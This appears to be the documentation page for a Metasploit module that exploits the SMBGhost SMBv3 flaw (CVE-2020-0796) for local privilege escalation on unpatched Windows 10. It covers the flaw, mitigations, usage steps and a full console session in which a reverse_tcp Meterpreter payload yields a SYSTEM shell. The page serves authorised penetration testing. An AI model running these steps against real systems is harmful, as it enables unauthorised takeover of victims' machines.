Grant Willcox
3.5 KiB
Vulnerable Application
A vulnerability exists within the Microsoft Server Message Block 3.1.1 (SMBv3) protocol that can be leveraged to execute code on a vulnerable server. This local exploit implementation leverages this flaw to elevate itself before injecting a payload into winlogon.exe.
This vulnerability was patched in March 2020 but prior to that enough information was publicly available to trigger a crash which led to pre-patch workarounds. The official recommendation from Microsoft at the time was to disable SMBv3 compression, a feature which this exploit relies on. The module's check method will determine this value using the registry to identify whether or not compression has been disabled.
Other recommendations included restricting access to TCP port 445 via firewalls. Given that this is a local exploit and the connection is made to the local host this is likely an ineffective measure against this particular implementation of the vulnerability.
Installation And Setup
Windows 10 versions 1903 and 1909 (without the patch) are vulnerable out of the box. The default setting is to have SMBv3 compression enabled.
Verification Steps
- Start msfconsole
- Get a Meterpreter session on a vulnerable host
- Do:
use exploit/windows/local/cve_2020_0796_smbghost - Set the
SESSIONandPAYLOADoptions - Do:
run - You should get a shell.
Scenarios
Windows 10 Version 1909 Build 18363.418 x64
msf5 exploit(windows/local/cve_2020_0796_smbghost) > sessions -i -1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: DESKTOP-PKLKKF7\user
meterpreter > sysinfo
Computer : DESKTOP-PKLKKF7
OS : Windows 10 (10.0 Build 18363).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 5
Meterpreter : x64/windows
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(windows/local/cve_2020_0796_smbghost) > show options
Module options (exploit/windows/local/cve_2020_0796_smbghost):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION -1 yes The session to run this module on.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.159.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 10 v1903-1909 x64
msf5 exploit(windows/local/cve_2020_0796_smbghost) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] Windows Build Number = 18363
[+] The target appears to be vulnerable.
[*] Reflectively injecting the exploit DLL and executing it...
[*] Sending stage (206403 bytes) to 192.168.159.153
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >